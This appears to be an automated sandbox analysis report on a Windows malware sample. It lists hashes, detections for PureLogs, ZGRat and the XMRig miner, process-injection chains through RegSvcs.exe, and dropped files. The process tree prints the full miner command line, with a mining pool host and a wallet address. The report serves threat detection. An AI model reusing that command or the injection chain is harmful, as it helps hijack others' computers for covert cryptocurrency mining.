Analysis
-
max time kernel
172s -
max time network
190s -
platform
windows10-2004_x64 -
resource
win10v2004-20231127-en -
resource tags
arch:x64arch:x86image:win10v2004-20231127-enlocale:en-usos:windows10-2004-x64system -
submitted
30-11-2023 19:08
General
-
Target
66c8e00f46e83d91c5920cf9638b03b8b9095d22ed58744f2abc9fdebc550c9f.exe
-
Size
1.3MB
-
MD5
5a8c19f0298f074877ae3f0fdcf4e40f
-
SHA1
7bf4408ad28f32a1ec63840a8a2c59916e77df81
-
SHA256
66c8e00f46e83d91c5920cf9638b03b8b9095d22ed58744f2abc9fdebc550c9f
-
SHA512
00ffdde9b5d270b379ff10c6524aa2a1ba4e62d9a4de8ef931d41a4b3045e8cc079905edcef5e3fe927126b365b676b7b0e75c0c6d16d29e32f6a122f2e37625
-
SSDEEP
24576:Og+tmm6ugk+8JujxZ2YPBzK5tUMxdEvYt2RnG:OgrjpvsuXK5BsSP
Malware Config
Signatures
-
Detect PureLogs payload 4 IoCs
resource yara_rule behavioral1/memory/3792-0-0x0000020173A80000-0x0000020173BCE000-memory.dmp family_purelogs behavioral1/files/0x0008000000023246-20.dat family_purelogs behavioral1/files/0x0008000000023246-21.dat family_purelogs behavioral1/files/0x0008000000023246-25.dat family_purelogs -
Detect ZGRat V1 1 IoCs
resource yara_rule behavioral1/memory/4800-10-0x000001855CBA0000-0x000001855CCA0000-memory.dmp family_zgrat_v1 -
XMRig Miner payload 12 IoCs
resource yara_rule behavioral1/memory/4716-46-0x0000000140000000-0x00000001407CF000-memory.dmp xmrig behavioral1/memory/4716-47-0x0000000140000000-0x00000001407CF000-memory.dmp xmrig behavioral1/memory/4716-48-0x0000000140000000-0x00000001407CF000-memory.dmp xmrig behavioral1/memory/4716-50-0x0000000140000000-0x00000001407CF000-memory.dmp xmrig behavioral1/memory/4716-51-0x0000000140000000-0x00000001407CF000-memory.dmp xmrig behavioral1/memory/4716-52-0x0000000140000000-0x00000001407CF000-memory.dmp xmrig behavioral1/memory/4716-53-0x0000000140000000-0x00000001407CF000-memory.dmp xmrig behavioral1/memory/4716-54-0x0000000140000000-0x00000001407CF000-memory.dmp xmrig behavioral1/memory/4716-55-0x0000000140000000-0x00000001407CF000-memory.dmp xmrig behavioral1/memory/4716-59-0x0000000140000000-0x00000001407CF000-memory.dmp xmrig behavioral1/memory/4716-60-0x0000000140000000-0x00000001407CF000-memory.dmp xmrig behavioral1/memory/4716-61-0x0000000140000000-0x00000001407CF000-memory.dmp xmrig -
Executes dropped EXE 2 IoCs
pid Process 4060 TypeId.exe 2544 TypeId.exe -
Suspicious use of SetThreadContext 5 IoCs
description pid Process procid_target PID 3792 set thread context of 4800 3792 66c8e00f46e83d91c5920cf9638b03b8b9095d22ed58744f2abc9fdebc550c9f.exe 89 PID 4060 set thread context of 2544 4060 TypeId.exe 93 PID 2544 set thread context of 724 2544 TypeId.exe 94 PID 724 set thread context of 4624 724 RegSvcs.exe 95 PID 4624 set thread context of 4716 4624 RegSvcs.exe 98 -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 3792 66c8e00f46e83d91c5920cf9638b03b8b9095d22ed58744f2abc9fdebc550c9f.exe 4060 TypeId.exe 724 RegSvcs.exe 4624 RegSvcs.exe 4624 RegSvcs.exe 4624 RegSvcs.exe 4624 RegSvcs.exe 4624 RegSvcs.exe 4624 RegSvcs.exe 4624 RegSvcs.exe 4624 RegSvcs.exe 4624 RegSvcs.exe 4624 RegSvcs.exe 4624 RegSvcs.exe 4624 RegSvcs.exe 4624 RegSvcs.exe 4624 RegSvcs.exe 4624 RegSvcs.exe 4624 RegSvcs.exe 4624 RegSvcs.exe 4624 RegSvcs.exe 4624 RegSvcs.exe 4624 RegSvcs.exe 4624 RegSvcs.exe 4624 RegSvcs.exe 4624 RegSvcs.exe 4624 RegSvcs.exe 4624 RegSvcs.exe 4624 RegSvcs.exe 4624 RegSvcs.exe 4624 RegSvcs.exe 4624 RegSvcs.exe 4624 RegSvcs.exe 4624 RegSvcs.exe 4624 RegSvcs.exe 4624 RegSvcs.exe 4624 RegSvcs.exe 4624 RegSvcs.exe 4624 RegSvcs.exe 4624 RegSvcs.exe 4624 RegSvcs.exe 4624 RegSvcs.exe 4624 RegSvcs.exe 4624 RegSvcs.exe 4624 RegSvcs.exe 4624 RegSvcs.exe 4624 RegSvcs.exe 4624 RegSvcs.exe 4624 RegSvcs.exe 4624 RegSvcs.exe 4624 RegSvcs.exe 4624 RegSvcs.exe 4624 RegSvcs.exe 4624 RegSvcs.exe 4624 RegSvcs.exe 4624 RegSvcs.exe 4624 RegSvcs.exe 4624 RegSvcs.exe 4624 RegSvcs.exe 4624 RegSvcs.exe 4624 RegSvcs.exe 4624 RegSvcs.exe 4624 RegSvcs.exe 4624 RegSvcs.exe -
Suspicious behavior: LoadsDriver 1 IoCs
pid Process 652 Process not Found -
Suspicious use of AdjustPrivilegeToken 8 IoCs
description pid Process Token: SeDebugPrivilege 3792 66c8e00f46e83d91c5920cf9638b03b8b9095d22ed58744f2abc9fdebc550c9f.exe Token: SeDebugPrivilege 4800 66c8e00f46e83d91c5920cf9638b03b8b9095d22ed58744f2abc9fdebc550c9f.exe Token: SeDebugPrivilege 4060 TypeId.exe Token: SeDebugPrivilege 2544 TypeId.exe Token: SeDebugPrivilege 724 RegSvcs.exe Token: SeDebugPrivilege 4624 RegSvcs.exe Token: SeLockMemoryPrivilege 4716 AddInProcess.exe Token: SeLockMemoryPrivilege 4716 AddInProcess.exe -
Suspicious use of FindShellTrayWindow 1 IoCs
pid Process 4716 AddInProcess.exe -
Suspicious use of WriteProcessMemory 39 IoCs
description pid Process procid_target PID 3792 wrote to memory of 4800 3792 66c8e00f46e83d91c5920cf9638b03b8b9095d22ed58744f2abc9fdebc550c9f.exe 89 PID 3792 wrote to memory of 4800 3792 66c8e00f46e83d91c5920cf9638b03b8b9095d22ed58744f2abc9fdebc550c9f.exe 89 PID 3792 wrote to memory of 4800 3792 66c8e00f46e83d91c5920cf9638b03b8b9095d22ed58744f2abc9fdebc550c9f.exe 89 PID 3792 wrote to memory of 4800 3792 66c8e00f46e83d91c5920cf9638b03b8b9095d22ed58744f2abc9fdebc550c9f.exe 89 PID 3792 wrote to memory of 4800 3792 66c8e00f46e83d91c5920cf9638b03b8b9095d22ed58744f2abc9fdebc550c9f.exe 89 PID 3792 wrote to memory of 4800 3792 66c8e00f46e83d91c5920cf9638b03b8b9095d22ed58744f2abc9fdebc550c9f.exe 89 PID 4060 wrote to memory of 2544 4060 TypeId.exe 93 PID 4060 wrote to memory of 2544 4060 TypeId.exe 93 PID 4060 wrote to memory of 2544 4060 TypeId.exe 93 PID 4060 wrote to memory of 2544 4060 TypeId.exe 93 PID 4060 wrote to memory of 2544 4060 TypeId.exe 93 PID 4060 wrote to memory of 2544 4060 TypeId.exe 93 PID 2544 wrote to memory of 724 2544 TypeId.exe 94 PID 2544 wrote to memory of 724 2544 TypeId.exe 94 PID 2544 wrote to memory of 724 2544 TypeId.exe 94 PID 2544 wrote to memory of 724 2544 TypeId.exe 94 PID 2544 wrote to memory of 724 2544 TypeId.exe 94 PID 2544 wrote to memory of 724 2544 TypeId.exe 94 PID 2544 wrote to memory of 724 2544 TypeId.exe 94 PID 724 wrote to memory of 4624 724 RegSvcs.exe 95 PID 724 wrote to memory of 4624 724 RegSvcs.exe 95 PID 724 wrote to memory of 4624 724 RegSvcs.exe 95 PID 724 wrote to memory of 4624 724 RegSvcs.exe 95 PID 724 wrote to memory of 4624 724 RegSvcs.exe 95 PID 724 wrote to memory of 4624 724 RegSvcs.exe 95 PID 4624 wrote to memory of 4716 4624 RegSvcs.exe 98 PID 4624 wrote to memory of 4716 4624 RegSvcs.exe 98 PID 4624 wrote to memory of 4716 4624 RegSvcs.exe 98 PID 4624 wrote to memory of 4716 4624 RegSvcs.exe 98 PID 4624 wrote to memory of 4716 4624 RegSvcs.exe 98 PID 4624 wrote to memory of 4716 4624 RegSvcs.exe 98 PID 4624 wrote to memory of 4716 4624 RegSvcs.exe 98 PID 4624 wrote to memory of 4716 4624 RegSvcs.exe 98 PID 4624 wrote to memory of 4716 4624 RegSvcs.exe 98 PID 4624 wrote to memory of 4716 4624 RegSvcs.exe 98 PID 4624 wrote to memory of 4716 4624 RegSvcs.exe 98 PID 4624 wrote to memory of 4716 4624 RegSvcs.exe 98 PID 4624 wrote to memory of 4716 4624 RegSvcs.exe 98 PID 4624 wrote to memory of 4716 4624 RegSvcs.exe 98 -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Users\Admin\AppData\Local\Temp\66c8e00f46e83d91c5920cf9638b03b8b9095d22ed58744f2abc9fdebc550c9f.exe"C:\Users\Admin\AppData\Local\Temp\66c8e00f46e83d91c5920cf9638b03b8b9095d22ed58744f2abc9fdebc550c9f.exe"1⤵
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3792 -
C:\Users\Admin\AppData\Local\Temp\66c8e00f46e83d91c5920cf9638b03b8b9095d22ed58744f2abc9fdebc550c9f.exeC:\Users\Admin\AppData\Local\Temp\66c8e00f46e83d91c5920cf9638b03b8b9095d22ed58744f2abc9fdebc550c9f.exe2⤵
- Suspicious use of AdjustPrivilegeToken
PID:4800
-
-
C:\Users\Admin\AppData\Roaming\NextChannelSink\TypeId.exeC:\Users\Admin\AppData\Roaming\NextChannelSink\TypeId.exe1⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4060 -
C:\Users\Admin\AppData\Roaming\NextChannelSink\TypeId.exeC:\Users\Admin\AppData\Roaming\NextChannelSink\TypeId.exe2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2544 -
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe3⤵
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:724 -
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe4⤵
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4624 -
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe -o xmr.2miners.com:2222 -u 41ro9pm28wkFbbFCnmC78AfqpdFTw3fE56kajDNhw3naU9nXJQiqSvi7Vv71yAxLG3hXtP5Jne8utHn1oHsPXo1MQBhA5D6.miners -p x --algo rx/0 --cpu-max-threads-hint=505⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
PID:4716
-
-
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\66c8e00f46e83d91c5920cf9638b03b8b9095d22ed58744f2abc9fdebc550c9f.exe.log
Filesize1KB
MD584a01db52ea5a878520e162c80acfcd3
SHA149b7c5c072f6c32e54cc97c1dcbee90de0dd4738
SHA25625ff806b9c85928aee814fa3aebbf45fa9735a7f594a6261f0779e89eb8c3bfe
SHA5120516cbe6b9b7842be7f00ba3159a4df31257fc4e9db8ccb8f9f720801174f3d49327b7881c59ea12a4767c6d3e7c99a3b707c10279dfb39f12f9792134e6248e
-
Filesize
1KB
MD584a01db52ea5a878520e162c80acfcd3
SHA149b7c5c072f6c32e54cc97c1dcbee90de0dd4738
SHA25625ff806b9c85928aee814fa3aebbf45fa9735a7f594a6261f0779e89eb8c3bfe
SHA5120516cbe6b9b7842be7f00ba3159a4df31257fc4e9db8ccb8f9f720801174f3d49327b7881c59ea12a4767c6d3e7c99a3b707c10279dfb39f12f9792134e6248e
-
Filesize
1KB
MD584a01db52ea5a878520e162c80acfcd3
SHA149b7c5c072f6c32e54cc97c1dcbee90de0dd4738
SHA25625ff806b9c85928aee814fa3aebbf45fa9735a7f594a6261f0779e89eb8c3bfe
SHA5120516cbe6b9b7842be7f00ba3159a4df31257fc4e9db8ccb8f9f720801174f3d49327b7881c59ea12a4767c6d3e7c99a3b707c10279dfb39f12f9792134e6248e
-
Filesize
1.3MB
MD55a8c19f0298f074877ae3f0fdcf4e40f
SHA17bf4408ad28f32a1ec63840a8a2c59916e77df81
SHA25666c8e00f46e83d91c5920cf9638b03b8b9095d22ed58744f2abc9fdebc550c9f
SHA51200ffdde9b5d270b379ff10c6524aa2a1ba4e62d9a4de8ef931d41a4b3045e8cc079905edcef5e3fe927126b365b676b7b0e75c0c6d16d29e32f6a122f2e37625
-
Filesize
1.3MB
MD55a8c19f0298f074877ae3f0fdcf4e40f
SHA17bf4408ad28f32a1ec63840a8a2c59916e77df81
SHA25666c8e00f46e83d91c5920cf9638b03b8b9095d22ed58744f2abc9fdebc550c9f
SHA51200ffdde9b5d270b379ff10c6524aa2a1ba4e62d9a4de8ef931d41a4b3045e8cc079905edcef5e3fe927126b365b676b7b0e75c0c6d16d29e32f6a122f2e37625
-
Filesize
1.3MB
MD55a8c19f0298f074877ae3f0fdcf4e40f
SHA17bf4408ad28f32a1ec63840a8a2c59916e77df81
SHA25666c8e00f46e83d91c5920cf9638b03b8b9095d22ed58744f2abc9fdebc550c9f
SHA51200ffdde9b5d270b379ff10c6524aa2a1ba4e62d9a4de8ef931d41a4b3045e8cc079905edcef5e3fe927126b365b676b7b0e75c0c6d16d29e32f6a122f2e37625